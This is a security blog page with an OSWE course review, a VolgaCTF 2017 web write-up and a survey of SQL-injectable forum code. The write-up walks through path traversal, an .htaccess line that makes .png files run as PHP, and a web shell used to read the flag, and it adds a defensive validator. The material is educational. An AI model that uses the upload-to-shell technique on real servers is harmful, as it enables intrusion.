<p><b>ICheer_No0M</b>: Hacking | Security | Analysis | CTF Write-up. (Blogger profile: http://www.blogger.com/profile/06070190416176409719)</p>
<h2>Review of the AWAE course and the OSWE certification exam from Offensive Security</h2>
<p>Published 2020-08-13, last updated 2020-10-02.</p>
<p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihamPU2v6LC9-eJCPZ0pJ5esa-0GYQKIJsljdcMgxeQpQP9X3ZgYjizXcTcihsKpJEEf18K-YnnDKGudocRU_jEe2olcxw19k-c-z_zfZlNuXVk0HtfE_-Dx81j_Dl4b0CMOdpiJfe2Dzd/s500/awae_logo.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="446" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihamPU2v6LC9-eJCPZ0pJ5esa-0GYQKIJsljdcMgxeQpQP9X3ZgYjizXcTcihsKpJEEf18K-YnnDKGudocRU_jEe2olcxw19k-c-z_zfZlNuXVk0HtfE_-Dx81j_Dl4b0CMOdpiJfe2Dzd/s320/awae_logo.jpg" /></a></p>
<h3 style="text-align: left;"><b>What is AWAE?</b></h3>
<p style="text-align: justify;">AWAE stands for <a href="https://www.offensive-security.com/awae-oswe/" rel="nofollow" target="_blank">Advanced Web Attacks and Exploitation</a>. It is one of the online cyber security courses from Offensive Security, the company that develops and maintains the Kali Linux project. The course focuses on white-box web application penetration testing: you are given the web application's source code, in various languages, analyse it for vulnerabilities and attack the target web application. That also covers source code review, i.e. finding security vulnerabilities in source code.</p>
<h3 style="text-align: justify;"><b>AWAE Online?</b></h3>
<p style="text-align: justify;">Previously, anyone who wanted to take this course had to attend it as training at a Black Hat conference held abroad (<a href="https://www.blackhat.com/asia-18/training/advanced-web-attacks-and-exploitation.html" rel="nofollow" target="_blank">Black Hat Asia 2018 | Advanced Web Attacks and Exploitation</a>). In March 2019 Offensive Security announced that the AWAE course could be purchased and studied online, just like Penetration Testing with Kali Linux (PWK). The details are here: <a href="https://www.offensive-security.com/offsec/awae-now-available-anywhere-anytime/" rel="nofollow" target="_blank">AWAE Now Available Anywhere, Anytime</a></p>
<h3 style="text-align: justify;"><b>AWAE Course?</b></h3>
<p style="text-align: justify;">The course gives students a PDF of roughly 400+ pages and about 10 hours of video, plus VPN access to a lab network of practice machines for following along with the PDF and videos. How long you can access the lab depends on the package you register for, such as 30, 60 or 90 days, each at a different price, and access can be extended by buying more time.</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLI2KSf4ufDmsB3VTCdFNoJbPRd9WO_oIQfY4yV3fd5ffINOtvvT3VlTUcw3fEpKEwKEqew0Ev12iko9kfgxXZHXmgqfnIJyQARMJ9oirgxOz15eLYQaNEN-S4vc3kiSbJqXUSvAxLfFo/s1178/awae_pricing.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1178" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLI2KSf4ufDmsB3VTCdFNoJbPRd9WO_oIQfY4yV3fd5ffINOtvvT3VlTUcw3fEpKEwKEqew0Ev12iko9kfgxXZHXmgqfnIJyQARMJ9oirgxOz15eLYQaNEN-S4vc3kiSbJqXUSvAxLfFo/w400-h245/awae_pricing.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="text-align: justify;">The course teaches source code analysis of web applications written in several programming languages (PHP, .NET, Java, NodeJS), decompiling, debugging, and modifying HTTP requests, using tools such as Burp Suite, dnSpy and JD-GUI. The course content is roughly as follows:</p>
<ul><li>Web security tools and methodologies</li><li>Source code analysis</li><li>Persistent cross-site scripting</li><li>Session hijacking</li><li>.NET deserialization</li><li>Remote code execution</li><li>Blind SQL injections</li><li>Data exfiltration</li><li>Bypassing file upload restrictions and file extension filters</li><li>PHP type juggling with loose comparisons</li><li>PostgreSQL Extension and User Defined Functions</li><li>Bypassing REGEX restrictions</li><li>Magic hashes</li><li>Bypassing character restrictions</li><li>UDF reverse shells</li><li>PostgreSQL large objects</li></ul>
<p>Newly added content: <a href="https://www.offensive-security.com/offsec/awae-2020-update/" rel="nofollow" target="_blank">AWAE: Updated with More Content for 2020</a></p>
<ul style="text-align: left;"><li>DOM-based cross site scripting (black box)</li><li>Server side template injection</li><li>Weak random token generation</li><li>XML external entity injection</li><li>RCE via database functions</li><li>OS command injection via WebSockets (black box)</li></ul>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcBIrhY4igcEsIAAR2EgtwOX7ToKJhsdIJOiFh-jl1EFsrwxCsXSI6K7KWRJkSzwBIjEym9hvWRI1JLbzL9lxOysgxZjFfbHNIS28pghzPu4WXDCeVEcNjlXHn4IbcrC-7Jkf_10-tmmvM/s601/offsec.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="401" data-original-width="601" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcBIrhY4igcEsIAAR2EgtwOX7ToKJhsdIJOiFh-jl1EFsrwxCsXSI6K7KWRJkSzwBIjEym9hvWRI1JLbzL9lxOysgxZjFfbHNIS28pghzPu4WXDCeVEcNjlXHn4IbcrC-7Jkf_10-tmmvM/w400-h267/offsec.jpg" width="400" /></a></div><p style="text-align: center;">Credit from @0xklaue</p>
<p style="text-align: justify;">The detailed course content is available here: <a href="https://www.offensive-security.com/documentation/awae-syllabus.pdf" rel="nofollow" target="_blank">Advanced Web Attacks and Exploitation Syllabus</a>. What I like about the PDF materials is the Extra Miles exercises, which ask you to think outside the box and build on what was covered in each chapter. They work like homework that you can practise in the lab, but homework without an answer key.</p>
<h3 style="text-align: justify;"><b>AWAE Lab?</b></h3>
<p style="text-align: justify;">The lab has about 5 machines, each a separate web application, which you connect to over VPN to study and follow along with the PDF and videos. Now that the course content has been updated, I expect there are more practice machines.</p>
<h3 style="text-align: justify;"><b>What is OSWE?</b></h3>
<p style="text-align: justify;">OSWE stands for Offensive Security Web Expert. It is the certification exam that measures your skills and understanding after studying the AWAE course and proves that you can apply what you learned according to AWAE's objectives. The exam is a hands-on, online exam over VPN, with a proctor watching you through your webcam and watching your screen the whole time; however many screens you have, all of them must be shared with the proctor. You get 47 hours 45 minutes, almost 2 days, for the practical part, and then 24 hours, or 1 day, to write and submit the report, so the OSWE exam takes almost 3 days in total. Shortly before the exam, Offensive Security sends the VPN credentials and basic instructions for setting up the webcam and verifying your identity; in my case that meant showing my national ID card to the proctor over the webcam.</p>
<p style="text-align: justify;">In the exam Offensive Security sets several main objectives to test your skills, one of which is "hack the target web application", including reading the contents of the local.txt and proof.txt files on the target web application/machine, as in the OSCP exam, but without the privilege escalation that OSCP requires. To pass, you must submit the contents of local.txt and proof.txt in the Exam Control Panel and score 85 or more out of 100. I will not go into much detail about what happens during the exam.</p>
<h3 style="text-align: left;"><b>Exam restrictions</b></h3>
<ul style="text-align: left;"><li>Source code analysis tools are not allowed</li><li>Automated exploitation tools are not allowed (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja)</li><li>Automated vulnerability scanners are not allowed (e.g. Nessus, NeXpose, OpenVas, Canvas)</li><li>Tools such as Nmap (including NSE scripts), Nikto, Burp Suite Free and DirBuster are exceptions and may be used</li></ul>
<p><span style="text-align: justify;">Offensive Security provides a report template for the OSWE exam. The report must cover each step and method, and should explain clearly what you did, which commands you used and what the result was; plenty of screenshots and detail is very good. Read more at </span><a href="https://support.offensive-security.com/oswe-exam-guide/" rel="nofollow" style="text-align: justify;" target="_blank">OSWE Certification Exam Guide</a></p>
<h3 style="text-align: justify;"><b>How should you prepare for the AWAE course and the OSWE exam?</b></h3>
<ul style="text-align: left;"><li>Having passed OSCP helps, but OSCP is not required to enrol in this course and take the exam. My PWK/OSCP review is at <a href="https://web.facebook.com/notes/secure-d-global/penetration-testing-with-kali-pwk-review/170369820492714/" rel="nofollow" target="_blank">Penetration Testing with Kali (PWK) Review</a></li><li>Being a web developer, or having built web applications before, helps with reading and understanding source code</li><li>Be comfortable reading and understanding code, or be fluent in at least one programming language, whether Java, .NET, JavaScript or Python</li><li>Be comfortable using Linux in various ways</li><li>Be able to write scripts in languages such as Python, Perl, PHP or Bash to automate the process of attacking a web application</li><li>Have experience with a web proxy such as Burp Suite (the course mainly uses Burp Suite)</li><li>Have a good theoretical and practical understanding of web application attacks</li></ul>
<h3 style="text-align: left;"><b>Exam Tips</b></h3>
<ul style="text-align: left;"><li>The AWAE course content is sufficient to pass OSWE</li><li>Try to complete all the Extra Miles exercises; they help a lot in the exam</li><li>The target web applications are custom-built or modified, so don't waste time looking for public exploits or CVEs to try; this isn't OSCP</li><li>Because the course is white-box, you are free to change code, edit database values or debug on the debugging machine during the exam</li><li>Try to understand how the web application works and what its functions do as thoroughly as possible, but you don't need to read every line or every file</li><li>Don't forget to save screenshots, snippets of the vulnerable code and notes during the exam so you don't forget the steps you have taken</li><li>Remember to take breaks during the exam; don't sit for more than 2-3 hours at a time. Get up from the computer, go for a walk, have a snack, play with the cat</li><li>If you are stuck on something for too long, change your approach; it may be a rabbit hole</li><li>Get enough rest before the exam starts</li><li>Don't give up until time runs out</li><li>Morale matters 💪</li></ul>
<h3 style="text-align: left;"><b>Interesting resources</b></h3>
<p style="text-align: left;"><a href="https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside">https://forum.hackthebox.eu/discussion/2646/oswe-exam-review-2020-notes-gifts-inside</a><br /><a href="https://github.com/timip/OSWE">https://github.com/timip/OSWE</a><br /><a href="https://github.com/wetw0rk/AWAE-PREP">https://github.com/wetw0rk/AWAE-PREP</a><br /><a href="https://github.com/deletehead/awae_oswe_prep">https://github.com/deletehead/awae_oswe_prep</a><br /><a href="https://kishanchoudhary.com/OSWE/Journey/OSWE.html">https://kishanchoudhary.com/OSWE/Journey/OSWE.html</a><br /><a href="https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/">https://cyber-dragon.nl/2020/06/10/oswe-cheat-sheet/</a><br /><a href="https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/">https://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/</a><br /><a href="https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf">https://owasp.org/www-pdf-archive/OWASP_Code_Review_Guide_v2.pdf</a></p>
<p>I hope this is useful to anyone interested 😀</p>
<h2>VolgaCTF 2017 Quals: Share Point (Web) Write-up</h2>
<p>Published 2017-03-26.</p>
<b>Description:</b><br />
<blockquote class="tr_bq">
Look! I wrote a good service for sharing your files with your friends, enjoy)</blockquote>
<b>Solution:</b><br />
<b><br /></b>
1. Access the target and find a login page. After logging in, the <b>Upload</b>, <b>Files</b> and <b>Share</b> functions appear.<br />
<br />
Upload - upload a file.<br />
Files - list of uploaded files.<br />
Share - share an uploaded file with another user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rHRMJanjoVII4oRRs34EzssCd8USQ8eFocUvJ3NMhChylDXObhisUMKkPAL5pWejdfC81jlxCXyOKbL53YV327DQTVXmRUj0WHi1qRV0GnH6m6V4jyQcjTq9R-b7iZ6q2QWPLWGCB2fK/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0rHRMJanjoVII4oRRs34EzssCd8USQ8eFocUvJ3NMhChylDXObhisUMKkPAL5pWejdfC81jlxCXyOKbL53YV327DQTVXmRUj0WHi1qRV0GnH6m6V4jyQcjTq9R-b7iZ6q2QWPLWGCB2fK/s400/1.PNG" width="400" /></a></div>
<br />
2. Trying to upload a PHP file fails.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Ag3B-Cm-iXCHJbMO9jI2S1WVBmZWHwrA1empFkuv-trl71eMdouK4USs-RqNp7_vLSX_knfMTerumjmkMUy-aJxiNyw9PlnZ6LcW-X2pNDUfzNE09LVhj0MawN0YZ__IwrXElI2PkWjQ/s1600/2+upload+php.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Ag3B-Cm-iXCHJbMO9jI2S1WVBmZWHwrA1empFkuv-trl71eMdouK4USs-RqNp7_vLSX_knfMTerumjmkMUy-aJxiNyw9PlnZ6LcW-X2pNDUfzNE09LVhj0MawN0YZ__IwrXElI2PkWjQ/s400/2+upload+php.PNG" width="400" /></a></div>
<br />
3. Uploading a PNG image file succeeds.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEAab58uk8UczZ7yRlennEXnkcPmuO28CNe21muQu_qGQ3dE4ab48j6gkYZNiWJYlAY-4Ad04oJFjZ6pVGXDkeGRXshra8bd9ik5PqTyoOxFpKVdz7jGv8M8Jpyi5tw1TvYUt8KLSN_I24/s1600/3+upload+png.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEAab58uk8UczZ7yRlennEXnkcPmuO28CNe21muQu_qGQ3dE4ab48j6gkYZNiWJYlAY-4Ad04oJFjZ6pVGXDkeGRXshra8bd9ik5PqTyoOxFpKVdz7jGv8M8Jpyi5tw1TvYUt8KLSN_I24/s400/3+upload+png.PNG" width="400" /></a></div>
<br />
4. I test the share function by sharing meme.png with another user.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0EDoLA7hC3SGu_3H73vBqFzMDrkKDvwKO9CKsIJc05M-xObLWMrGmy_m-XLzZY2eBDIEQzXqNUud6cAxjjdxQHQ2qOHfzxtnI7qU0uGxhb0CV2z22faCu588Lvb2PP68zL_Pq5qf3gy_9/s1600/3.1+share+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0EDoLA7hC3SGu_3H73vBqFzMDrkKDvwKO9CKsIJc05M-xObLWMrGmy_m-XLzZY2eBDIEQzXqNUud6cAxjjdxQHQ2qOHfzxtnI7qU0uGxhb0CV2z22faCu588Lvb2PP68zL_Pq5qf3gy_9/s400/3.1+share+file.PNG" width="400" /></a></div>
<br />
5. Intercepting the request with Burp Suite shows that the <b>filename</b> parameter is vulnerable to <a href="https://www.owasp.org/index.php/Path_Traversal">Path Traversal</a>: I can share <b>../../index.php</b> with another user, then log in as that user to read the PHP file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdeZKKJYw_VVEGTGI9_VFQP4JpeaO7SH8ptT07RxbMxoSbNBbG3tkBarearelQIdQ8MJ1jXRoMyfSekVtH8tNoIEvXCn1Q1BERahDzpmxzg1OEMsAFQEu-qsiBqCSQRs7ezBn0bKtcszof/s1600/3.3+test+share+path+traversal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdeZKKJYw_VVEGTGI9_VFQP4JpeaO7SH8ptT07RxbMxoSbNBbG3tkBarearelQIdQ8MJ1jXRoMyfSekVtH8tNoIEvXCn1Q1BERahDzpmxzg1OEMsAFQEu-qsiBqCSQRs7ezBn0bKtcszof/s400/3.3+test+share+path+traversal.PNG" width="400" /></a></div>
<br />
6. As the other user, I download index.php into my folder.<br />
Folder structure: http://share-point.quals.2017.volgactf.ru/files/<b>&lt;username&gt;</b>/<b>&lt;uploaded file&gt;</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_RneRxkO8KA6DMRNd2G5z3x0aYCUzZqxrAd_tlSYfSHtMvCYoDwzsKiTJqEhK7D6T7rH3XFcAon0XwOKQv4CbdyKSeRr4AyzGD5ij2jQFMGMWm9QuIg6Y-VcTffRnG3iS6rMgc6t7Cp8/s1600/3.4+download+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhy_RneRxkO8KA6DMRNd2G5z3x0aYCUzZqxrAd_tlSYfSHtMvCYoDwzsKiTJqEhK7D6T7rH3XFcAon0XwOKQv4CbdyKSeRr4AyzGD5ij2jQFMGMWm9QuIg6Y-VcTffRnG3iS6rMgc6t7Cp8/s400/3.4+download+file.PNG" width="400" /></a></div>
<br />
7. The file list.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLRC3Ofh7ZvsbJ7DPPiC99ZCvsUumNRV3pZ2av27daeX30Z7uXxIG1aiwY4m7KxNFVs73be-NuCsf6w0jI2ozpQaSUAvrU-YqdmcBrdaIBe8rcB4iwf0OifqeMy58grlBGegwEA8zkuziC/s1600/3.5+index+php+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLRC3Ofh7ZvsbJ7DPPiC99ZCvsUumNRV3pZ2av27daeX30Z7uXxIG1aiwY4m7KxNFVs73be-NuCsf6w0jI2ozpQaSUAvrU-YqdmcBrdaIBe8rcB4iwf0OifqeMy58grlBGegwEA8zkuziC/s400/3.5+index+php+file.PNG" width="400" /></a></div>
<br />
8. But when I access index.php, it returns <b>500 Internal Server Error</b>. It doesn't work :(<br />
9. After thinking for a few minutes, I try using <b>.htaccess</b> to make files ending in .png be processed as PHP:<br />
<br />
<b><i>AddType application/x-httpd-php .png</i></b><br />
<br />
10. Upload .htaccess and shell.png; shell.png contains PHP code for a simple web shell that uses the <a href="http://php.net/manual/en/function.system.php">system</a> function.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zLkq1HI-ldv-FP-kp22SQxhMxNJtm6mwmY6SSv5ZoCzQi9dGcoaGrBQL88z2Hf6TPmGx4l6Z8wZkAntUEQUykaTzOz61KqQJPoneOKwYrzZVf9BrsuzZTQsWt1-cAoIf9P7CJsnaLRaU/s1600/4.1+list+htaccess+php.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-zLkq1HI-ldv-FP-kp22SQxhMxNJtm6mwmY6SSv5ZoCzQi9dGcoaGrBQL88z2Hf6TPmGx4l6Z8wZkAntUEQUykaTzOz61KqQJPoneOKwYrzZVf9BrsuzZTQsWt1-cAoIf9P7CJsnaLRaU/s400/4.1+list+htaccess+php.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
11. Access shell.png at http://share-point.quals.2017.volgactf.ru/files/<b>&lt;username&gt;</b>/<b>shell.png?cmd=&lt;command&gt;</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSksoWfXCKqqLd6uMcVfG_6UkyOvVh-J0o69KIX1dCCfeCy0PW2x37-jLVyxMm5gWNijSy6uwYcdPusMQ2JysjEhyk0HmOGUEZLUCoupsHdGO0foEZQxGGrQO78Hc1GXJ7L0hLBE_pX5kh/s1600/5.1+ls.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSksoWfXCKqqLd6uMcVfG_6UkyOvVh-J0o69KIX1dCCfeCy0PW2x37-jLVyxMm5gWNijSy6uwYcdPusMQ2JysjEhyk0HmOGUEZLUCoupsHdGO0foEZQxGGrQO78Hc1GXJ7L0hLBE_pX5kh/s400/5.1+ls.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
12. Find the flag with the command <b>find / -name "*flag*"</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKEnFqkjpubvlS58w3r2xpDWqoDamy7IfRh2-hu_jnmZSBxblbK0p4yWaycy4ybMrOCZmPHwl9owz6BtVZce9zrwq80dhV0jyhD4oiqH6qO-Hvp5nuRkcjwGVjkwb-_4rFUrpy5PPfuWXJ/s1600/6+find+flag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKEnFqkjpubvlS58w3r2xpDWqoDamy7IfRh2-hu_jnmZSBxblbK0p4yWaycy4ybMrOCZmPHwl9owz6BtVZce9zrwq80dhV0jyhD4oiqH6qO-Hvp5nuRkcjwGVjkwb-_4rFUrpy5PPfuWXJ/s400/6+find+flag.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
13. <b>cat /opt/flag.txt</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTREmKWG49PbYyfNmPT_LrMtoERr-hXYwb0NwYBYKKNRpGZeb6FLne53q6ujegZMcYKZlU5LoMaMq-tGlYaFuUSWI13hp8TCyDXMnhIwgmsGzzBtuDhJ1mPzsW11BJ3Pjjzzjxuhgqrf9/s1600/7+found+flag.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTREmKWG49PbYyfNmPT_LrMtoERr-hXYwb0NwYBYKKNRpGZeb6FLne53q6ujegZMcYKZlU5LoMaMq-tGlYaFuUSWI13hp8TCyDXMnhIwgmsGzzBtuDhJ1mPzsW11BJ3Pjjzzjxuhgqrf9/s400/7+found+flag.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
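The defensive counterpart to steps 5 to 11, as an added example (my own code, not the challenge's source, which is not on the page): one validator used by the upload, share and download handlers that refuses traversal in the filename, refuses dotfiles such as .htaccess, and allow-lists extensions. The files root, usernames and the extension list are assumptions.

```python
"""Filename and path validation for a per-user file store (added example, not the
challenge's code). The write-up found two weaknesses: a share function that joined a
user-supplied filename to the user's directory without checking for traversal, and an
upload function that accepted a .htaccess file, which can tell Apache to run .png
files as PHP.

Assumed layout (hypothetical): <files_root>/<username>/<filename>

The upload tree should additionally be served with
    AllowOverride None          # Apache ignores any uploaded .htaccess
    php_admin_flag engine off   # mod_php never executes anything under it
so that a bypass of the checks below still does not give code execution.
"""
import posixpath
import re

# Allow-list of extensions the share service is meant to host (assumed); all else is refused.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "txt", "pdf"}

# Usernames become directory names, so they are limited to a safe character set.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")

# Filenames must start with a letter or digit (so no ".htaccess", ".", "..") and may not
# contain "/" or "\" (so no "../../index.php"), whitespace or control characters.
FILENAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


class UnsafePath(ValueError):
    """Raised when a username or filename is refused or would leave the user's directory."""


def file_extension(filename: str) -> str:
    """Return the lower-cased final extension, or '' if there is none."""
    return filename.rsplit(".", 1)[1].lower() if "." in filename else ""


def safe_user_path(files_root: str, username: str, filename: str) -> str:
    """Return the path of `filename` inside `username`'s directory under `files_root`.

    Raises UnsafePath rather than ever returning a path outside that directory. Using the
    same function for upload, share and download means every entry point applies the
    same rules, which is what the vulnerable share handler lacked.
    """
    if not USERNAME_RE.fullmatch(username):
        raise UnsafePath(f"invalid username: {username!r}")
    if not FILENAME_RE.fullmatch(filename):
        raise UnsafePath(f"invalid filename: {filename!r}")
    if file_extension(filename) not in ALLOWED_EXTENSIONS:
        raise UnsafePath(f"extension not allowed: {filename!r}")

    user_dir = posixpath.join(posixpath.normpath(files_root), username)
    full = posixpath.normpath(posixpath.join(user_dir, filename))
    # Defence in depth: the regexes already guarantee this, but confirm that the
    # normalised path is a direct child of the user's directory before using it.
    if posixpath.dirname(full) != user_dir or posixpath.basename(full) != filename:
        raise UnsafePath(f"path escapes user directory: {full!r}")
    return full


def is_refused(files_root: str, username: str, filename: str) -> bool:
    """True if safe_user_path refuses the request (handy for tests and logging)."""
    try:
        safe_user_path(files_root, username, filename)
    except UnsafePath:
        return True
    return False


if __name__ == "__main__":
    root = "/var/www/html/files"  # hypothetical files root
    for name in ["meme.png", "../../index.php", ".htaccess", "shell.php", "shell.png.php", "a/b.png"]:
        try:
            print(f"{name!r:20} -> {safe_user_path(root, 'alice', name)}")
        except UnsafePath as exc:
            print(f"{name!r:20} -> refused ({exc})")
```

Note that shell.png itself still passes the extension check, which is exactly why refusing .htaccess and disabling PHP in the upload tree are the controls that matter.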
<div class="separator" style="clear: both; text-align: left;">
<b>My automation script:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<a href="https://gist.github.com/icheernoom/0aa2e2fc35a66cf12e7e6949569c0d94">https://gist.github.com/icheernoom/0aa2e2fc35a66cf12e7e6949569c0d94</a>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRLUZe2w2p5Zc_X9GvkwmGZat3xbi_mGsvzSwCERmzF0mf_VrXn1Cly4wriyCZmMbkr64xkA9kmFJ4zev1hZXgQZRcKeLt-qYzFJ-cm24PqobnK4vzwyqzKF2lE07qjK8HuIaSDvJVIk8P/s1600/powershell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRLUZe2w2p5Zc_X9GvkwmGZat3xbi_mGsvzSwCERmzF0mf_VrXn1Cly4wriyCZmMbkr64xkA9kmFJ4zev1hZXgQZRcKeLt-qYzFJ-cm24PqobnK4vzwyqzKF2lE07qjK8HuIaSDvJVIk8P/s400/powershell.png" width="380" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghKtTjVE6VAGZLK-ejc93ieIzwVNQ0hpGsKu4QunulOHVJASbGn7QkEJ8bp3yhLpLANl7SC5W_GIdt4yuospzejqGLLVKj0Yan2jYbA9-9eNReVUmcE7jNr1mpXcYh0SG-a2MGL7YdyI8j/s1600/meme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghKtTjVE6VAGZLK-ejc93ieIzwVNQ0hpGsKu4QunulOHVJASbGn7QkEJ8bp3yhLpLANl7SC5W_GIdt4yuospzejqGLLVKj0Yan2jYbA9-9eNReVUmcE7jNr1mpXcYh0SG-a2MGL7YdyI8j/s1600/meme.png" /></a></div>
<br />
<b><span style="color: black;">Flag:</span></b> <b><span style="color: red;">VolgaCTF{AnoTHer_apPro0Ach_to_file_Upl0Ad_with_PhP}</span></b><br />
<h2>SQL Injection vulnerabilities in Thaicreate PHP questions</h2>
<p>Published 2016-12-13, last updated 2016-12-14.</p>
Following <a href="https://laurent22.github.io/so-injections/">SQL injections vulnerabilities in Stack Overflow PHP questions</a>, where someone built a site that pulls data from Stack Overflow to see how many PHP question askers post code with SQL injection vulnerabilities, and presents the results as nice statistics, I had the idea of doing the same for a site where people ask and answer PHP questions in Thailand. The one that came to mind is probably the largest programming Q&amp;A community in Thailand, covering many languages, PHP among them, which is my target. So I wrote a simple Python script to fetch data from the PHP forum on Thaicreate.com and find out how many PHP questions and answers contain code vulnerable to SQL injection, meaning code that concatenates user input into a SQL query statement without any validation. I took only the 30 most recent pages. I used the regular expression from <a href="https://laurent22.github.io/so-injections/">SQL injections vulnerabilities in Stack Overflow PHP questions</a>, with a few extra tweaks to the SQL injection check.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoy6t0bqaPbq56OxvVifO82V3p3NnzPY5hUxbt5q7BUrpxJbRLkQcUkiscw2YjrTOYZgoY2nEOYgzgYHcYuroOOIRPaM2SAQtb0Q08sq1bW4h1r9xUV2uYSnwds9lD28oCqQ1XzNwl8Mv/s1600/15369136_10207900697820695_8544240115395306181_o.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoy6t0bqaPbq56OxvVifO82V3p3NnzPY5hUxbt5q7BUrpxJbRLkQcUkiscw2YjrTOYZgoY2nEOYgzgYHcYuroOOIRPaM2SAQtb0Q08sq1bW4h1r9xUV2uYSnwds9lD28oCqQ1XzNwl8Mv/s400/15369136_10207900697820695_8544240115395306181_o.jpg" width="400" /></a></div>
<br />
The result: in the 30 most recent pages, about 220+ threads contained code vulnerable to SQL injection.<br />
